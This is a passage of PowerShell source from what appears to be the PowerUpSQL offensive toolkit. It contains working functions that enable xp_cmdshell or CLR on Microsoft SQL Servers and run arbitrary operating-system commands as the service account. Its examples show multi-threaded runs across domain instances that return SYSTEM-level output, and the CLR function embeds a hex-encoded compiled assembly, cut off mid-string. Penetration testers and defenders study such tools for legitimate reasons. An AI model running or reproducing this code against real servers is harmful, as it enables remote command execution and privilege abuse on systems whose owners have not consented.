C:\\> Get-SQLInstanceDomain | Get-SQLQueryThreaded -Verbose -Query \"Select @@version\" -Threads 15\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipeline = $true,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Connect using Dedicated Admin Connection.')]\n        [Switch]$DAC,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Default database to connect to.')]\n        [String]$Database,\n\n        [Parameter(Mandatory = $true,\n        HelpMessage = 'Query to be executed.')]\n        [String]$Query,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Connection timeout.')]\n        [string]$TimeOut,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Number of threads.')]\n        [int]$Threads = 5,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Setup data table for output\n        $TblResults = New-Object -TypeName System.Data.DataTable\n\n        # Setup data table for pipeline threading\n        $PipelineItems = New-Object -TypeName System.Data.DataTable\n\n        # set instance to local host by default\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Ensure provided instance is processed\n        if($Instance)\n        {\n            $ProvideInstance = New-Object -TypeName PSObject -Property @{\n                Instance = $Instance\n            }\n        }\n\n        # Add instance to instance list\n        $PipelineItems = $PipelineItems + $ProvideInstance\n    }\n\n    Process\n    {\n        # Create list of pipeline items\n        $PipelineItems = $PipelineItems + $_\n    }\n\n    End\n    {\n        # Define code to be multi-threaded\n        $MyScriptBlock = {\n            $Instance = $_.Instance\n\n            # Parse computer name from the instance\n            $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n            # Setup DAC string\n            if($DAC)\n            {\n                # Create connection object\n                $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut -Database $Database\n            }\n            else\n            {\n                # Create connection object\n                $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut -Database $Database\n            }\n\n            # Attempt connection\n            try\n            {\n                # Open connection\n                $Connection.Open()\n\n                if(-not $SuppressVerbose)\n                {\n                    Write-Verbose -Message \"$Instance : Connection Success.\"\n                }\n\n                # Setup SQL query\n                $Command = New-Object -TypeName System.Data.SqlClient.SqlCommand -ArgumentList ($Query, $Connection)\n\n                # Grab results\n                $Results = $Command.ExecuteReader()\n\n                # Load results into data table\n                $TblResults.Load($Results)\n\n                # Close connection\n                $Connection.Close()\n\n                # Dispose connection\n                $Connection.Dispose()\n            }\n            catch\n            {\n                # Connection failed\n\n                if(-not $SuppressVerbose)\n                {\n                    $ErrorMessage = $_.Exception.Message\n                    Write-Verbose -Message \"$Instance : Connection Failed.\"\n                    #Write-Verbose  \" Error: $ErrorMessage\"\n                }\n\n                # Add record\n                $null = $TblResults.Rows.Add(\"$ComputerName\",\"$Instance\",'Not Accessible')\n            }\n        }\n\n        # Run scriptblock using multi-threading\n        $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue\n\n        return $TblResults\n    }\n}\n\n#endregion\n\n#########################################################################\n#\n#region          COMMON FUNCTIONS\n#\n#########################################################################\n\n# ----------------------------------\n#  Invoke-SQLOSCmd\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Invoke-SQLOSCmd\n{\n    <#\n            .SYNOPSIS\n            Execute command on the operating system as the SQL Server service account using xp_cmdshell. Supports threading, raw output, and table output.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER DAC\n            Connect using Dedicated Admin Connection.\n            .PARAMETER TimeOut\n            Connection time out.\n            .PARAMETER SuppressVerbose\n            Suppress verbose errors.  Used when function is wrapped.\n            .PARAMETER Threads\n            Number of concurrent threads.\n            .PARAMETER Command\n            Operating command to be executed on the SQL Server.\n            .PARAMETER RawResults\n            Just show the raw results without the computer or instance name.\n            .EXAMPLE\n            PS C:\\> Invoke-SQLOSCmd -Verbose -Instance \"SQLServer1\" -Command \"dir c:\\windows\\system32\\drivers\\etc\\\" -RawResults\n            VERBOSE: Creating runspace pool and session states\n            VERBOSE: SQLServer1 : Connection Success.\n            VERBOSE: SQLServer1 : Connection Success.\n            VERBOSE: SQLServer1 : You are a sysadmin.\n            VERBOSE: SQLServer1 : Show Advanced Options is disabled.\n            VERBOSE: SQLServer1 : Enabled Show Advanced Options.\n            VERBOSE: SQLServer1 : xp_cmdshell is disabled.\n            VERBOSE: SQLServer1 : Enabled xp_cmdshell.\n            VERBOSE: SQLServer1 : Running command: dir c:\\windows\\system32\\drivers\\etc\\\n            VERBOSE: SQLServer1 : Disabling xp_cmdshell\n            VERBOSE: SQLServer1 : Disabling Show Advanced Options\n            Volume in drive C is OSDisk\n            Volume Serial Number is C044-F8BC\n\n            VERBOSE: Closing the runspace pool\n            output\n            ------\n\n            Directory of c:\\windows\\system32\\drivers\\etc\n\n            06/22/2016  09:09 AM    <DIR>          .\n            06/22/2016  09:09 AM    <DIR>          ..\n            09/22/2015  10:16 AM               851 hosts\n            08/22/2013  10:35 AM             3,683 lmhosts.sam\n            08/22/2013  08:25 AM               407 networks\n            08/22/2013  08:25 AM             1,358 protocol\n            08/22/2013  08:25 AM            17,463 services\n            5 File(s)         23,762 bytes\n            2 Dir(s)  56,438,497,280 bytes free\n            .EXAMPLE\n            PS C:\\> Invoke-SQLOSCmd -Verbose -Instance \"SQLSERVER1.domain.com,1433\" -Command \"whoami\"\n            Invoke-SQLOSCmd -Verbose -Instance \"SQLServer1\" -Command \"whoami\"\n            VERBOSE: Creating runspace pool and session states\n            VERBOSE: SQLServer1 : Connection Success.\n            VERBOSE: SQLServer1 : Connection Success.\n            VERBOSE: SQLServer1 : You are a sysadmin.\n            VERBOSE: SQLServer1 : Show Advanced Options is disabled.\n            VERBOSE: SQLServer1 : Enabled Show Advanced Options.\n            VERBOSE: SQLServer1 : xp_cmdshell is disabled.\n            VERBOSE: SQLServer1 : Enabled xp_cmdshell.\n            VERBOSE: SQLServer1 : Running command: whoami\n            VERBOSE: SQLServer1 : Disabling xp_cmdshell\n            VERBOSE: SQLServer1 : Disabling Show Advanced Options\n            VERBOSE: Closing the runspace pool\n\n            ComputerName   Instance       CommandResults\n            ------------   --------       --------------\n            SQLServer1     SQLServer1     nt service\\mssqlserver\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain | Invoke-SQLOSCmd -Verbose -Command \"whoami\" -Threads 5\n            Get-SQLInstanceLocal | Invoke-SQLOSCmd -Verbose -Command \"whoami\"\n            VERBOSE: Creating runspace pool and session states\n            VERBOSE: SQLServer1\\SQLEXPRESS : Connection Success.\n            VERBOSE: SQLServer1\\SQLEXPRESS : Connection Success.\n            VERBOSE: SQLServer1\\SQLEXPRESS : You are a sysadmin.\n            VERBOSE: SQLServer1\\SQLEXPRESS : Show Advanced Options is already enabled.\n            VERBOSE: SQLServer1\\SQLEXPRESS : xp_cmdshell is already enabled.\n            VERBOSE: SQLServer1\\SQLEXPRESS : Running command: whoami\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Connection Success.\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Connection Success.\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : You are a sysadmin.\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Show Advanced Options is already enabled.\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : xp_cmdshell is already enabled.\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Running command: whoami\n            VERBOSE: SQLServer1 : Connection Success.\n            VERBOSE: SQLServer1 : Connection Success.\n            VERBOSE: SQLServer1 : You are a sysadmin.\n            VERBOSE: SQLServer1 : Show Advanced Options is disabled.\n            VERBOSE: SQLServer1 : Enabled Show Advanced Options.\n            VERBOSE: SQLServer1 : xp_cmdshell is disabled.\n            VERBOSE: SQLServer1 : Enabled xp_cmdshell.\n            VERBOSE: SQLServer1 : Running command: whoami\n            VERBOSE: SQLServer1 : Disabling xp_cmdshell\n            VERBOSE: SQLServer1 : Disabling Show Advanced Options\n            VERBOSE: Closing the runspace pool\n\n            ComputerName   Instance                       CommandResults\n            ------------   --------                       --------------\n            SQLServer1     SQLServer1\\SQLEXPRESS          nt service\\mssql$sqlexpress\n            SQLServer1     SQLServer1\\STANDARDDEV2014     nt authority\\system\n            SQLServer1     SQLServer1                     nt service\\mssqlserver\n\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipeline = $true,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Connect using Dedicated Admin Connection.')]\n        [Switch]$DAC,\n\n        [Parameter(Mandatory = $true,\n        HelpMessage = 'OS command to be executed.')]\n        [String]$Command,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Connection timeout.')]\n        [string]$TimeOut,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Number of threads.')]\n        [int]$Threads = 1,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Just show the raw results without the computer or instance name.')]\n        [switch]$RawResults\n    )\n\n    Begin\n    {\n        # Setup data table for output\n        $TblCommands = New-Object -TypeName System.Data.DataTable\n        $TblResults = New-Object -TypeName System.Data.DataTable\n        $null = $TblResults.Columns.Add('ComputerName')\n        $null = $TblResults.Columns.Add('Instance')\n        $null = $TblResults.Columns.Add('CommandResults')\n\n\n        # Setup data table for pipeline threading\n        $PipelineItems = New-Object -TypeName System.Data.DataTable\n\n        # set instance to local host by default\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Ensure provided instance is processed\n        if($Instance)\n        {\n            $ProvideInstance = New-Object -TypeName PSObject -Property @{\n                Instance = $Instance\n            }\n        }\n\n        # Add instance to instance list\n        $PipelineItems = $PipelineItems + $ProvideInstance\n    }\n\n    Process\n    {\n        # Create list of pipeline items\n        $PipelineItems = $PipelineItems + $_\n    }\n\n    End\n    {\n        # Define code to be multi-threaded\n        $MyScriptBlock = {\n            $Instance = $_.Instance\n\n            # Parse computer name from the instance\n            $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n            # Default connection to local default instance\n            if(-not $Instance)\n            {\n                $Instance = $env:COMPUTERNAME\n            }\n\n            # Setup DAC string\n            if($DAC)\n            {\n                # Create connection object\n                $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut\n            }\n            else\n            {\n                # Create connection object\n                $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut\n            }\n\n            # Attempt connection\n            try\n            {\n                # Open connection\n                $Connection.Open()\n\n                if(-not $SuppressVerbose)\n                {\n                    Write-Verbose -Message \"$Instance : Connection Success.\"\n                }\n\n                # Switch to track xp_cmdshell status\n                $DisableShowAdvancedOptions = 0\n                $DisableXpCmdshell = 0\n\n                # Get sysadmin status\n                $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin\n\n                # Check if xp_cmdshell is enabled\n                if($IsSysadmin -eq 'Yes')\n                {\n                    Write-Verbose -Message \"$Instance : You are a sysadmin.\"\n                    $IsXpCmdshellEnabled = Get-SQLQuery -Instance $Instance -Query \"sp_configure 'xp_cmdshell'\" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value\n                    $IsShowAdvancedEnabled = Get-SQLQuery -Instance $Instance -Query \"sp_configure 'Show Advanced Options'\" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value\n                }\n                else\n                {\n                    Write-Verbose -Message \"$Instance : You are not a sysadmin. This command requires sysadmin privileges.\"\n\n                    # Add record\n                    $null = $TblResults.Rows.Add(\"$ComputerName\",\"$Instance\",'No sysadmin privileges.')\n                    return\n                }\n\n                # Enable show advanced options if needed\n                if ($IsShowAdvancedEnabled -eq 1)\n                {\n                    Write-Verbose -Message \"$Instance : Show Advanced Options is already enabled.\"\n                }\n                else\n                {\n                    Write-Verbose -Message \"$Instance : Show Advanced Options is disabled.\"\n                    $DisableShowAdvancedOptions = 1\n\n                    # Try to enable Show Advanced Options\n                    Get-SQLQuery -Instance $Instance -Query \"sp_configure 'Show Advanced Options',1;RECONFIGURE\" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n                    # Check if configuration change worked\n                    $IsShowAdvancedEnabled2 = Get-SQLQuery -Instance $Instance -Query \"sp_configure 'Show Advanced Options'\" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value\n\n                    if ($IsShowAdvancedEnabled2 -eq 1)\n                    {\n                        Write-Verbose -Message \"$Instance : Enabled Show Advanced Options.\"\n                    }\n                    else\n                    {\n                        Write-Verbose -Message \"$Instance : Enabling Show Advanced Options failed. Aborting.\"\n\n                        # Add record\n                        $null = $TblResults.Rows.Add(\"$ComputerName\",\"$Instance\",'Could not enable Show Advanced Options.')\n                        return\n                    }\n                }\n\n                # Enable xp_cmdshell if needed\n                if ($IsXpCmdshellEnabled -eq 1)\n                {\n                    Write-Verbose -Message \"$Instance : xp_cmdshell is already enabled.\"\n                }\n                else\n                {\n                    Write-Verbose -Message \"$Instance : xp_cmdshell is disabled.\"\n                    $DisableXpCmdshell = 1\n\n                    # Try to enable xp_cmdshell\n                    Get-SQLQuery -Instance $Instance -Query \"sp_configure 'xp_cmdshell',1;RECONFIGURE\" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n                    # Check if configuration change worked\n                    $IsXpCmdshellEnabled2 = Get-SQLQuery -Instance $Instance -Query 'sp_configure xp_cmdshell' -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value\n\n                    if ($IsXpCmdshellEnabled2 -eq 1)\n                    {\n                        Write-Verbose -Message \"$Instance : Enabled xp_cmdshell.\"\n                    }\n                    else\n                    {\n                        Write-Verbose -Message \"$Instance : Enabling xp_cmdshell failed. Aborting.\"\n\n                        # Add record\n                        $null = $TblResults.Rows.Add(\"$ComputerName\",\"$Instance\",'Could not enable xp_cmdshell.')\n\n                        return\n                    }\n                }\n\n                # Setup OS command\n                Write-Verbose -Message \"$Instance : Running command: $Command\"\n                #$Query = \"EXEC master..xp_cmdshell '$Command' WITH RESULT SETS ((output VARCHAR(MAX)))\"\n                $Query = \"EXEC master..xp_cmdshell '$Command'\"\n\n                # Execute OS command\n                $CmdResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property output -ExpandProperty output\n\n                # Display results or add to final results table\n                if($RawResults)\n                {\n                    $CmdResults\n                }\n                else\n                {\n                    $null = $TblResults.Rows.Add($ComputerName, $Instance, [string]$CmdResults)\n                }\n\n                # Restore xp_cmdshell state if needed\n                if($DisableXpCmdshell -eq 1)\n                {\n                    Write-Verbose -Message \"$Instance : Disabling xp_cmdshell\"\n                    Get-SQLQuery -Instance $Instance -Query \"sp_configure 'xp_cmdshell',0;RECONFIGURE\" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n                }\n\n                # Restore Show Advanced Options state if needed\n                if($DisableShowAdvancedOptions -eq 1)\n                {\n                    Write-Verbose -Message \"$Instance : Disabling Show Advanced Options\"\n                    Get-SQLQuery -Instance $Instance -Query \"sp_configure 'Show Advanced Options',0;RECONFIGURE\" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n                }\n\n                # Close connection\n                $Connection.Close()\n\n                # Dispose connection\n                $Connection.Dispose()\n            }\n            catch\n            {\n                # Connection failed\n\n                if(-not $SuppressVerbose)\n                {\n                    $ErrorMessage = $_.Exception.Message\n                    Write-Verbose -Message \"$Instance : Connection Failed.\"\n                    #Write-Verbose  \" Error: $ErrorMessage\"\n                }\n\n                # Add record\n                $null = $TblResults.Rows.Add(\"$ComputerName\",\"$Instance\",'Not Accessible')\n            }\n        }\n\n        # Run scriptblock using multi-threading\n        $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue\n\n        return $TblResults\n    }\n}\n\n\n# ----------------------------------\n#  Invoke-SQLOSCmdCLR\n# ----------------------------------\n# Author: Scott Sutherland\n# Note: This is based on Nathan Kirk's CRL template. \n# Reference: http://sekirkity.com/seeclrly-fileless-sql-server-clr-based-custom-stored-procedure-command-execution/\n# Reference: https://msdn.microsoft.com/en-us/library/microsoft.sqlserver.server.sqlpipe.sendresultsrow(v=vs.110).aspx\nFunction  Invoke-SQLOSCmdCLR\n{\n    <#\n            .SYNOPSIS\n            Execute command on the operating system as the SQL Server service account using a \n            generated CLR assembly with CREATE ASSEMBLY and CREATE PROCEDURE. \n            Supports threading, raw output, and table output.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER DAC\n            Connect using Dedicated Admin Connection.\n            .PARAMETER TimeOut\n            Connection time out.\n            .PARAMETER SuppressVerbose\n            Suppress verbose errors.  Used when function is wrapped.\n            .PARAMETER Threads\n            Number of concurrent threads.\n            .PARAMETER Command\n            Operating command to be executed on the SQL Server.\n            .PARAMETER RawResults\n            Just show the raw results without the computer or instance name.\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Invoke-SQLOSCmdCLR -Verbose -Command \"whoami\"\n            VERBOSE: Creating runspace pool and session states\n            VERBOSE: MSSQLSRV04 : Connection Failed.\n            VERBOSE: MSSQLSRV04\\BOSCHSQL : Connection Success.\n            VERBOSE: MSSQLSRV04\\BOSCHSQL : You are not a sysadmin. This command requires sysadmin privileges.\n            VERBOSE: MSSQLSRV04\\SQLSERVER2014 : Connection Success.\n            VERBOSE: MSSQLSRV04\\SQLSERVER2014 : You are a sysadmin.\n            VERBOSE: MSSQLSRV04\\SQLSERVER2014 : Show Advanced Options is already enabled.\n            VERBOSE: MSSQLSRV04\\SQLSERVER2014 : CLR is already enabled.\n            VERBOSE: MSSQLSRV04\\SQLSERVER2014 : Running command: whoami\n            VERBOSE: MSSQLSRV04\\SQLSERVER2016 : Connection Failed.\n            VERBOSE: Closing the runspace pool\n\n            ComputerName                                      Instance                                          CommandResults                                   \n            ------------                                      --------                                          --------------                                                                                 \n            MSSQLSRV04                                        MSSQLSRV04\\BOSCHSQL                               No sysadmin privileges.                          \n            MSSQLSRV04                                        MSSQLSRV04\\SQLSERVER2014                          nt authority\\system                              \n            MSSQLSRV04                                        MSSQLSRV04\\SQLSERVER2016                          Not Accessible\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipeline = $true,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Connect using Dedicated Admin Connection.')]\n        [Switch]$DAC,\n\n        [Parameter(Mandatory = $true,\n        HelpMessage = 'OS command to be executed.')]\n        [String]$Command,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Connection timeout.')]\n        [string]$TimeOut,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Number of threads.')]\n        [int]$Threads = 1,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Just show the raw results without the computer or instance name.')]\n        [switch]$RawResults\n    )\n\n    Begin\n    {\n        # Setup data table for output\n        $TblCommands = New-Object -TypeName System.Data.DataTable\n        $TblResults = New-Object -TypeName System.Data.DataTable\n        $null = $TblResults.Columns.Add('ComputerName')\n        $null = $TblResults.Columns.Add('Instance')\n        $null = $TblResults.Columns.Add('CommandResults')\n\n\n        # Setup data table for pipeline threading\n        $PipelineItems = New-Object -TypeName System.Data.DataTable\n\n        # set instance to local host by default\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Ensure provided instance is processed\n        if($Instance)\n        {\n            $ProvideInstance = New-Object -TypeName PSObject -Property @{\n                Instance = $Instance\n            }\n        }\n\n        # Add instance to instance list\n        $PipelineItems = $PipelineItems + $ProvideInstance\n    }\n\n    Process\n    {\n        # Create list of pipeline items\n        $PipelineItems = $PipelineItems + $_\n    }\n\n    End\n    {\n        # Define code to be multi-threaded\n        $MyScriptBlock = {\n            $Instance = $_.Instance\n\n            # Parse computer name from the instance\n            $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n            # Default connection to local default instance\n            if(-not $Instance)\n            {\n                $Instance = $env:COMPUTERNAME\n            }\n\n            # Setup DAC string\n            if($DAC)\n            {\n                # Create connection object\n                $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut\n            }\n            else\n            {\n                # Create connection object\n                $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut\n            }\n\n            # Attempt connection\n            try\n            {\n                # Open connection\n                $Connection.Open()\n\n                if(-not $SuppressVerbose)\n                {\n                    Write-Verbose -Message \"$Instance : Connection Success.\"\n                }\n\n                # Switch to track CLR status\n                $DisableShowAdvancedOptions = 0\n                $DisableCLR = 0\n\n                # Get sysadmin status\n                $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin\n\n                # Check if CLR is enabled\n                if($IsSysadmin -eq 'Yes')\n                {\n                    Write-Verbose -Message \"$Instance : You are a sysadmin.\"\n                    $IsCLREnabled = Get-SQLQuery -Instance $Instance -Query \"sp_configure 'CLR Enabled'\" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value\n                    $IsShowAdvancedEnabled = Get-SQLQuery -Instance $Instance -Query \"sp_configure 'Show Advanced Options'\" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value\n                }\n                else\n                {\n                    Write-Verbose -Message \"$Instance : You are not a sysadmin. This command requires sysadmin privileges.\"\n\n                    # Add record\n                    $null = $TblResults.Rows.Add(\"$ComputerName\",\"$Instance\",'No sysadmin privileges.')\n                    return\n                }\n\n                # Enable show advanced options if needed\n                if ($IsShowAdvancedEnabled -eq 1)\n                {\n                    Write-Verbose -Message \"$Instance : Show Advanced Options is already enabled.\"\n                }\n                else\n                {\n                    Write-Verbose -Message \"$Instance : Show Advanced Options is disabled.\"\n                    $DisableShowAdvancedOptions = 1\n\n                    # Try to enable Show Advanced Options\n                    Get-SQLQuery -Instance $Instance -Query \"sp_configure 'Show Advanced Options',1;RECONFIGURE\" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n                    # Check if configuration change worked\n                    $IsShowAdvancedEnabled2 = Get-SQLQuery -Instance $Instance -Query \"sp_configure 'Show Advanced Options'\" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value\n\n                    if ($IsShowAdvancedEnabled2 -eq 1)\n                    {\n                        Write-Verbose -Message \"$Instance : Enabled Show Advanced Options.\"\n                    }\n                    else\n                    {\n                        Write-Verbose -Message \"$Instance : Enabling Show Advanced Options failed. Aborting.\"\n\n                        # Add record\n                        $null = $TblResults.Rows.Add(\"$ComputerName\",\"$Instance\",'Could not enable Show Advanced Options.')\n                        return\n                    }\n                }\n\n                # Enable CLR if needed\n                if ($IsCLREnabled -eq 1)\n                {\n                    Write-Verbose -Message \"$Instance : CLR is already enabled.\"\n                }\n                else\n                {\n                    Write-Verbose -Message \"$Instance : CLR is disabled.\"\n                    $DisableCLR = 1\n\n                    # Try to enable CLR\n                    Get-SQLQuery -Instance $Instance -Query \"sp_configure 'CLR Enabled',1;RECONFIGURE\" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n                    # Check if configuration change worked\n                    $IsCLREnabled2 = Get-SQLQuery -Instance $Instance -Query 'sp_configure \"CLR Enabled\"' -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value\n\n                    if ($IsCLREnabled2 -eq 1)\n                    {\n                        Write-Verbose -Message \"$Instance : Enabled CLR.\"\n                    }\n                    else\n                    {\n                        Write-Verbose -Message \"$Instance : Enabling CLR failed. Aborting.\"\n\n                        # Add record\n                        $null = $TblResults.Rows.Add(\"$ComputerName\",\"$Instance\",'Could not enable CLR.')\n\n                        return\n                    }\n                }\n\n                # Create assembly\n                $Query_AddAssembly = \"CREATE ASSEMBLY [cmd_exec] AUTHORIZATION [dbo] from 0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C0103008A8FF9580000000000000000E00002210B010B000008000000060000000000004E270000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000002700004B00000000400000A002000000000000000000000000000000000000006000000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E7465787400000054070000002000000008000000020000000000000000000000000000200000602E72737263000000A00200000040000000040000000A0000000000000000000000000000400000402E72656C6F6300000C0000000060000000020000000E000000000000000000000000000040000042000000000000000000000000000000003027000000000000480000000200050028210000D8050000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013300500C30000000100001100730400000A0A066F0500000A72010000706F0600000A00066F0500000A72390000700F00280700000A280800000A6F0900000A00066F0500000A166F0A00000A00066F0500000A176F0B00000A00066F0C00000A26178D090000010C081672490000701F0C20A00F00006A730D00000AA208730E00000A0B280F00000A076F1000000A000716066F1100000A6F1200000A6F1300000A6F1400000A00280F00000A076F1500000A00280F00000A6F1600000A00066F1700000A00066F1800000A002A1E02281900000A2A0042534A4201000100000000000C00000076342E302E33303331390000000005006C000000E0010000237E00004C0200009002000023537472696E677300000000DC040000580000002355530034050000100000002347554944000000440500009400000023426C6F620000000000000002000001471502000900000000FA253300160000010000000F000000020000000200000001000000190000000300000001000000010000000300000000000A000100000000000600370030000A005F004A000600A40084000600C40084000A000501EA000E002E011B010E0036011B0106006C0130000A00BD01EA000A00C9013E000A00D301EA000A00E101EA000A00EC01EA00060018020E02060038020E0200000000010000000000010001000100100016000000050001000100502000000000960069000A0001001F21000000008618720010000200000001007800190072001400210072001000290072001000310072001000310047011E00390055012300110062012800410073012C0039007A01230039008801320039009C0132003100B7013700490072003B005900720043006100F4014A006900FD014F0031002502550079004302280009004D022800590056025A00690060024F0069006F02100031007E02100031008A02100009007200100020001B0019002E000B006A002E00130073006000048000000000000000000000000000000000E2000000040000000000000000000000010027000000000004000000000000000000000001003E000000000004000000000000000000000001003000000000000000003C4D6F64756C653E00434C5246696C652E646C6C0053746F72656450726F63656475726573006D73636F726C69620053797374656D004F626A6563740053797374656D2E446174610053797374656D2E446174612E53716C54797065730053716C537472696E6700636D645F65786563002E63746F720065786563436F6D6D616E640053797374656D2E52756E74696D652E436F6D70696C6572536572766963657300436F6D70696C6174696F6E52656C61786174696F6E734174747269627574650052756E74696D65436F6D7061746962696C697